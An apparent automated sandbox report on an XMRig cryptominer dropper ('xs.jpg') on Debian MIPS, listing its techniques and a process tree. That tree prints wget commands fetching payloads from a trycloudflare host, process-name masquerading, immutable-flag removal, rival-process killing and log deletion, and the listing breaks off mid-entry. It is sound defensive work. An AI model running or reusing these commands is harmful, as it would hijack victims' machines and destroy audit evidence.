xmrig | b1570e2b2c9d957d943fb37f266ec48a51bee9db0a39dcd15ceb884384f8f6a1

Analysis

max time kernel
151s
max time network
47s
platform
debian-9_mipsel
resource
debian9-mipsel-20231215-en
resource tags

arch:mipselimage:debian9-mipsel-20231215-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
22-01-2024 18:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

xs.jpg
Size

5KB
MD5

30f950242f01e4e8503da91dbb2d5fdc
SHA1

cb9909bebcbc056e05e74b9c3c3b33a6a7a47659
SHA256

b1570e2b2c9d957d943fb37f266ec48a51bee9db0a39dcd15ceb884384f8f6a1
SHA512

229364a466b0a7cdb47a3061a36336c6426ebe06a747788967080a79ebf902b41a38f4870dbc5396afbdd8b75a42273f81ed131f133ffa3be68a3bf364e4a0d2
SSDEEP

96:uou4dH1Yl9iaV4GmNdCvasvagaevagvaGvaV1FtIxH7YmJE7N7MDMtBPXSEKydtu:ndVM9iazmNdCvXvDfvZvNvW1LIxH7Ym/

Score

10^/10

xmrig evasion miner persistence

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral4/files/fstream-2.dat	family_xmrig
behavioral4/files/fstream-2.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Modifies the dynamic linker configuration file 1 TTPs 1 IoCs

Malware can modify the configuration file of the dynamic linker to preload malicous libraries with every executed process.

persistence

Hijack Execution Flow

T1574

description	ioc
File opened for modification	/etc/ld.so.preload

Deletes Audit logs 1 TTPs 1 IoCs

Deletes logs related to the Linux Audit framework.

evasion

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/audit/audit.log	rm

Deletes system logs 1 TTPs 3 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/messages	rm
File deleted	/var/log/syslog	rm
File truncated	/var/log/messages	Process not Found

Executes dropped EXE 4 IoCs

ioc	pid	Process
/tmp/.sock	759	.sock
/usr/lib/procf/x	871	x
/usr/lib/procf/kexec	894	kexec
/usr/lib/procf/deamon-hoster	907	deamon-hoster

Writes DNS configuration 1 TTPs 1 IoCs

Writes data to DNS resolver config file.

Dynamic Resolution

T1568

description	ioc	Process
File opened for modification	/etc/resolv.conf	xs.jpg

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
1108	xargs
1143	xargs
1232	xargs
1307	xargs
1341	xargs
1089	xargs
1030	xargs
1292	xargs
940	xargs
1376	xargs
1411	xargs
1589	xargs
797	xargs
1242	xargs
1257	xargs
1525	xargs
1629	xargs
1138	xargs
1060	xargs
1222	xargs
1277	xargs
1322	xargs
1361	xargs
1396	xargs
1545	xargs
952	xargs
804	chattr
1183	xargs
1272	xargs
1436	xargs
802	xargs
1148	xargs
1173	xargs
1262	xargs
1386	xargs
732	chattr
1470	xargs
1485	xargs
1555	xargs
1599	xargs
1654	xargs
988	xargs
1074	xargs
1247	xargs
1366	xargs
1535	xargs
1624	xargs
929	xargs
1302	xargs
1431	xargs
1500	xargs
1669	xargs
1094	xargs
1178	xargs
1213	xargs
1351	xargs
1401	xargs
1426	xargs
1594	xargs
1023	xargs
974	xargs
1356	xargs
1649	xargs
777	xargs

Creates/modifies environment variables 1 TTPs 1 IoCs

Creating/modifying environment variables is a common persistence mechanism.

persistence

Hijack Execution Flow

T1574

description	ioc	Process
File opened for modification	/root/.bashrc	xs.jpg

Deletes log files 1 TTPs 32 IoCs

Deletes log files on the system.

Indicator Removal

T1070

description	ioc	Process
File deleted	/var/log/daemon.log	rm
File deleted	/var/log/debug	rm
File deleted	/var/log/dpkg.log	rm
File deleted	/var/log/faillog	rm
File deleted	/var/log/installer/hardware-summary	rm
File deleted	/var/log/alternatives.log	rm
File deleted	/var/log/apt/term.log	rm
File deleted	/var/log/audit	rm
File deleted	/var/log/installer/syslog	rm
File deleted	/var/log/kern.log	rm
File deleted	/var/log/installer/partman	rm
File deleted	/var/log/apt/eipp.log.xz	rm
File deleted	/var/log/installer/lsb-release	rm
File truncated	/var/log/secure	Process not Found
File deleted	/var/log/lastlog	rm
File deleted	/var/log/apt/history.log	rm
File deleted	/var/log/exim4	rm
File deleted	/var/log/installer/cdebconf/templates.dat	rm
File deleted	/var/log/installer	rm
File deleted	/var/log/wtmp	rm
File truncated	/var/log/btmp	Process not Found
File deleted	/var/log/apt	rm
File deleted	/var/log/auth.log	rm
File deleted	/var/log/fontconfig.log	rm
File deleted	/var/log/installer/cdebconf/questions.dat	rm
File deleted	/var/log/installer/status	rm
File deleted	/var/log/user.log	rm
File truncated	/var/log/laslog	Process not Found
File deleted	/var/log/btmp	rm
File deleted	/var/log/exim4/mainlog	rm
File deleted	/var/log/installer/cdebconf	rm
File truncated	/var/log/wtmp	Process not Found

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 64 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Modifies Bash startup script 1 TTPs 1 IoCs

persistence

Boot or Logon Autostart Execution

T1547

description	ioc	Process
File opened for modification	/root/.bashrc	xs.jpg

Enumerates kernel/hardware configuration 1 TTPs 1 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/697/status	ps
File opened for reading	/proc/12/status	ps
File opened for reading	/proc/171/stat	ps
File opened for reading	/proc/171/cmdline	ps
File opened for reading	/proc/20/cmdline	ps
File opened for reading	/proc/3/stat	ps
File opened for reading	/proc/907/cmdline	ps
File opened for reading	/proc/14/status	ps
File opened for reading	/proc/697/cmdline	ps
File opened for reading	/proc/345/status	ps
File opened for reading	/proc/156/status	ps
File opened for reading	/proc/11/stat	ps
File opened for reading	/proc/7/stat	ps
File opened for reading	/proc/122/stat	ps
File opened for reading	/proc/156/stat	ps
File opened for reading	/proc/84/status	ps
File opened for reading	/proc/369/cmdline	ps
File opened for reading	/proc/564/stat	ps
File opened for reading	/proc/345/cmdline	ps
File opened for reading	/proc/3/stat	ps
File opened for reading	/proc/3/cmdline	ps
File opened for reading	/proc/10/status	ps
File opened for reading	/proc/15/cmdline	ps
File opened for reading	/proc/70/stat	ps
File opened for reading	/proc/550/status	ps
File opened for reading	/proc/24/status	ps
File opened for reading	/proc/1440/cmdline	ps
File opened for reading	/proc/400/stat	ps
File opened for reading	/proc/122/cmdline	ps
File opened for reading	/proc/36/cmdline	ps
File opened for reading	/proc/171/stat	ps
File opened for reading	/proc/726/cmdline	ps
File opened for reading	/proc/257/status	ps
File opened for reading	/proc/411/cmdline	ps
File opened for reading	/proc/564/cmdline	ps
File opened for reading	/proc/721/cmdline	ps
File opened for reading	/proc/14/cmdline	ps
File opened for reading	/proc/718/stat	ps
File opened for reading	/proc/345/cmdline	ps
File opened for reading	/proc/1271/stat	ps
File opened for reading	/proc/82/status	ps
File opened for reading	/proc/81/stat	ps
File opened for reading	/proc/5/stat	ps
File opened for reading	/proc/81/cmdline	ps
File opened for reading	/proc/1669/cmdline	ps
File opened for reading	/proc/11/status	ps
File opened for reading	/proc/23/status	ps
File opened for reading	/proc/8/stat	ps
File opened for reading	/proc/726/cmdline	ps
File opened for reading	/proc/69/stat	ps
File opened for reading	/proc/36/status	ps
File opened for reading	/proc/15/cmdline	ps
File opened for reading	/proc/370/status	ps
File opened for reading	/proc/24/cmdline	ps
File opened for reading	/proc/121/cmdline	ps
File opened for reading	/proc/6/cmdline	ps
File opened for reading	/proc/1452/cmdline	ps
File opened for reading	/proc/112/stat	ps
File opened for reading	/proc/716/stat	ps
File opened for reading	/proc/70/stat	ps
File opened for reading	/proc/6/stat	ps
File opened for reading	/proc/411/stat	ps
File opened for reading	/proc/781/cmdline	ps
File opened for reading	/proc/716/cmdline	ps

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.sock	wget

/tmp/xs.jpg
/tmp/xs.jpg
1⤵
- Writes DNS configuration
- Creates/modifies environment variables
- Modifies Bash startup script
PID:724
- /bin/chmod
  chmod +wr /tmp
  2⤵
  PID:730
- /usr/bin/chattr
  chattr -ia /tmp
  2⤵
  - Attempts to change immutable files
  PID:732
- /usr/bin/chattr
  chattr -ia /etc/ld.so.preload
  2⤵
  PID:734
- /bin/cat
  cat /dev/null
  2⤵
  PID:737
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/netsocketx -O /tmp/.sock
  2⤵
  - Writes file to tmp directory
  PID:749
- /bin/chmod
  chmod +x /tmp/.sock
  2⤵
  PID:757
- /bin/sleep
  sleep 1
  2⤵
  PID:758
- /usr/bin/id
  id -u
  2⤵
  PID:760
- /usr/bin/nohup
  nohup bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-mipsel-20231215-en-3 -accept-tos"
  2⤵
  PID:759
- /usr/local/sbin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-mipsel-20231215-en-3 -accept-tos"
  2⤵
  PID:759
- /usr/local/bin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-mipsel-20231215-en-3 -accept-tos"
  2⤵
  PID:759
- /usr/sbin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-mipsel-20231215-en-3 -accept-tos"
  2⤵
  PID:759
- /usr/bin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-mipsel-20231215-en-3 -accept-tos"
  2⤵
  PID:759
- /sbin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-mipsel-20231215-en-3 -accept-tos"
  2⤵
  PID:759
- /bin/bash
  bash -c "exec -a '[network-managerr]' /tmp/.sock [email protected] -password=random#123 -device-name=debian9-mipsel-20231215-en-3 -accept-tos"
  2⤵
  PID:759
- /tmp/.sock
  "[network-managerr]" "[email protected]" "-password=random#123" "-device-name=debian9-mipsel-20231215-en-3" -accept-tos
  2⤵
  - Executes dropped EXE
  PID:759
- /bin/grep
  grep "\\[inet_frag_qw]"
  2⤵
  PID:769
- /bin/ps
  ps -ef
  2⤵
  PID:768
- /bin/grep
  grep -v grep
  2⤵
  PID:770
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:771
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:772
- /bin/ps
  ps -ef
  2⤵
  - Reads CPU attributes
  PID:773
- /bin/grep
  grep "\\[ipv6_addrconfd]"
  2⤵
  PID:774
- /bin/grep
  grep -v grep
  2⤵
  PID:775
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:776
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:777
- /bin/ps
  ps -ef
  2⤵
  - Reads runtime system information
  PID:778
- /bin/grep
  grep sysinit
  2⤵
  PID:779
- /bin/grep
  grep -v grep
  2⤵
  PID:780
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:781
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:782
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:783
- /bin/grep
  grep "\\[watchdodg]"
  2⤵
  PID:784
- /bin/grep
  grep -v grep
  2⤵
  PID:785
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:786
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:787
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:788
- /bin/grep
  grep "\\[bdus-daemon]"
  2⤵
  PID:789
- /bin/grep
  grep -v grep
  2⤵
  PID:790
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:791
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:792
- /bin/ps
  ps aux
  2⤵
  PID:793
- /bin/grep
  grep "\\[slub_flushqw]"
  2⤵
  PID:794
- /bin/grep
  grep -v grep
  2⤵
  PID:795
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:796
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:797
- /bin/ps
  ps aux
  2⤵
  PID:798
- /bin/grep
  grep deamon-hoster
  2⤵
  PID:799
- /bin/grep
  grep -v grep
  2⤵
  PID:800
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:801
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:802
- /usr/bin/id
  id -u
  2⤵
  PID:803
- /usr/bin/chattr
  chattr -ia /usr/lib/procf
  2⤵
  - Attempts to change immutable files
  PID:804
- /bin/rm
  rm -rf /usr/lib/procf
  2⤵
  PID:805
- /usr/bin/id
  id -u
  2⤵
  PID:806
- /bin/mkdir
  mkdir -p /usr/lib/procf
  2⤵
  PID:807
- /usr/bin/id
  id -u
  2⤵
  PID:808
- /bin/chmod
  chmod +w /usr/lib/procf
  2⤵
  PID:809
- /usr/bin/chattr
  chattr -ia /usr/lib/procf
  2⤵
  PID:810
- /bin/rm
  rm -rf /usr/lib/procf
  2⤵
  PID:811
- /bin/mkdir
  mkdir /usr/lib/procf
  2⤵
  PID:812
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/x4 -O /usr/lib/procf/x
  2⤵
  PID:814
- /bin/chmod
  chmod +x /usr/lib/procf/x
  2⤵
  PID:827
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/kexec2 -O /usr/lib/procf/kexec
  2⤵
  PID:832
- /bin/chmod
  chmod +x /usr/lib/procf/kexec
  2⤵
  PID:866
- /usr/bin/wget
  wget --no-check-certificate https://beaver-manage-strikes-beautiful.trycloudflare.com/kc -O /usr/lib/procf/deamon-hoster
  2⤵
  PID:868
- /bin/chmod
  chmod +x /usr/lib/procf/deamon-hoster
  2⤵
  PID:869
- /bin/chmod
  chmod +x /usr/lib/procf/deamon-hoster /usr/lib/procf/kexec /usr/lib/procf/x
  2⤵
  PID:870
- /bin/sleep
  sleep 3
  2⤵
  PID:872
- /usr/bin/nohup
  nohup bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:871
- /usr/local/sbin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:871
- /usr/local/bin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:871
- /usr/sbin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:871
- /usr/bin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:871
- /sbin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:871
- /bin/bash
  bash -c "exec -a '[ipv6_addrconfd]' /usr/lib/procf/x"
  2⤵
  PID:871
- /usr/lib/procf/x
  "[ipv6_addrconfd]"
  2⤵
  - Executes dropped EXE
  PID:871
- /bin/sleep
  sleep 3
  2⤵
  PID:895
- /usr/bin/nohup
  nohup bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:894
- /usr/local/sbin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:894
- /usr/local/bin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:894
- /usr/sbin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:894
- /usr/bin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:894
- /sbin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:894
- /bin/bash
  bash -c "exec -a '[bdus-daemon]' /usr/lib/procf/kexec"
  2⤵
  PID:894
- /usr/lib/procf/kexec
  "[bdus-daemon]"
  2⤵
  - Executes dropped EXE
  PID:894
- /bin/sleep
  sleep 5
  2⤵
  PID:908
- /usr/bin/nohup
  nohup /usr/lib/procf/deamon-hoster
  2⤵
  PID:907
- /usr/lib/procf/deamon-hoster
  /usr/lib/procf/deamon-hoster
  2⤵
  - Executes dropped EXE
  PID:907
- - /bin/sleep
    sleep 3
    3⤵
    PID:909
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:910
- - /bin/grep
    grep -v grep
    3⤵
    PID:911
- - /bin/grep
    grep miner
    3⤵
    PID:912
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:913
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:914
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:915
- - /bin/grep
    grep -v grep
    3⤵
    PID:916
- - /bin/grep
    grep gitlabw
    3⤵
    PID:917
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:918
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:919
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:920
- - /bin/grep
    grep -v grep
    3⤵
    PID:921
- - /bin/grep
    grep xmp
    3⤵
    PID:922
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:923
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:924
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:925
- - /bin/grep
    grep -v grep
    3⤵
    PID:926
- - /bin/grep
    grep juiceSSH
    3⤵
    PID:927
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:928
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:929
- - /bin/ps
    ps aux
    3⤵
    PID:936
- - /bin/grep
    grep -v grep
    3⤵
    PID:937
- - /bin/grep
    grep khnug
    3⤵
    PID:938
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:939
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:940
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:948
- - /bin/grep
    grep -v grep
    3⤵
    PID:949
- - /bin/grep
    grep Linux2
    3⤵
    PID:950
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:951
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:952
- - /bin/ps
    ps aux
    3⤵
    PID:958
- - /bin/grep
    grep -v grep
    3⤵
    PID:960
- - /bin/grep
    grep kthreaddi
    3⤵
    PID:962
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:964
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:965
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:970
- - /bin/grep
    grep -v grep
    3⤵
    PID:971
- - /bin/grep
    grep kkssl
    3⤵
    PID:972
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:973
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:974
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:984
- - /bin/grep
    grep -v grep
    3⤵
    PID:985
- - /bin/grep
    grep cnrig
    3⤵
    PID:986
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:987
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:988
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1011
- - /bin/grep
    grep -v grep
    3⤵
    PID:1012
- - /bin/grep
    grep stratum
    3⤵
    PID:1013
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1014
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1015
- - /bin/ps
    ps aux
    3⤵
    PID:1019
- - /bin/grep
    grep -v grep
    3⤵
    PID:1020
- - /bin/grep
    grep vscode
    3⤵
    PID:1021
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1022
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1023
- - /bin/ps
    ps aux
    3⤵
    PID:1026
- - /bin/grep
    grep -v grep
    3⤵
    PID:1027
- - /bin/grep
    grep "runsv puma"
    3⤵
    PID:1028
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1029
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1030
- - /bin/grep
    grep -v grep
    3⤵
    PID:1037
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1036
- - /bin/grep
    grep xmrig
    3⤵
    PID:1038
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1039
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1040
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1046
- - /bin/grep
    grep -v grep
    3⤵
    PID:1047
- - /bin/grep
    grep c3pool
    3⤵
    PID:1048
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1049
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1050
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1056
- - /bin/grep
    grep -v grep
    3⤵
    PID:1057
- - /bin/grep
    grep kthreaddk
    3⤵
    PID:1058
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1059
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1060
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1065
- - /bin/grep
    grep -v grep
    3⤵
    PID:1066
- - /bin/grep
    grep pool
    3⤵
    PID:1067
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1068
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1069
- - /bin/ps
    ps aux
    3⤵
    PID:1070
- - /bin/grep
    grep -v grep
    3⤵
    PID:1071
- - /bin/grep
    grep dbused
    3⤵
    PID:1072
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1073
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1074
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    - Reads runtime system information
    PID:1075
- - /bin/grep
    grep -v grep
    3⤵
    PID:1076
- - /bin/grep
    grep kdevtmpfsi
    3⤵
    PID:1077
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1078
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1079
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1080
- - /bin/grep
    grep -v grep
    3⤵
    PID:1081
- - /bin/grep
    grep kinsing
    3⤵
    PID:1082
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1083
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1084
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1085
- - /bin/grep
    grep -v grep
    3⤵
    PID:1086
- - /bin/grep
    grep supportxmr
    3⤵
    PID:1087
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1088
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1089
- - /bin/ps
    ps aux
    3⤵
    PID:1090
- - /bin/grep
    grep -v grep
    3⤵
    PID:1091
- - /bin/grep
    grep xmr
    3⤵
    PID:1092
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1093
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1094
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1095
- - /bin/grep
    grep -v grep
    3⤵
    PID:1096
- - /bin/grep
    grep kthreaddw
    3⤵
    PID:1097
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1098
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1099
- - /bin/rm
    rm -rf /tmp/xs.jpg
    3⤵
    PID:1100
- - /bin/rm
    rm -rf "/var/tmp/*"
    3⤵
    PID:1101
- - /bin/rm
    rm -rf "/dev/shm/*"
    3⤵
    PID:1102
- - /bin/sleep
    sleep 3
    3⤵
    PID:1103
- - /bin/ps
    ps aux
    3⤵
    PID:1104
- - /bin/grep
    grep -v grep
    3⤵
    PID:1105
- - /bin/grep
    grep miner
    3⤵
    PID:1106
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1107
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    - Attempts to change immutable files
    PID:1108
- - /bin/ps
    ps aux
    3⤵
    - Reads runtime system information
    PID:1109
- - /bin/grep
    grep -v grep
    3⤵
    PID:1110
- - /bin/grep
    grep gitlabw
    3⤵
    PID:1111
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1112
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1113
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1114
- - /bin/grep
    grep -v grep
    3⤵
    PID:1115
- - /bin/grep
    grep xmp
    3⤵
    PID:1116
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1117
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
    PID:1118
- - /bin/ps
    ps aux
    3⤵
    - Reads CPU attributes
    PID:1119
- - /bin/grep
    grep -v grep
    3⤵
    PID:1120
- - /bin/grep
    grep juiceSSH
    3⤵
    PID:1121
- - /usr/bin/awk
    awk "{print \$2}"
    3⤵
    PID:1122
- - /usr/bin/xargs
    xargs -I "%" kill -9 "%"
    3⤵
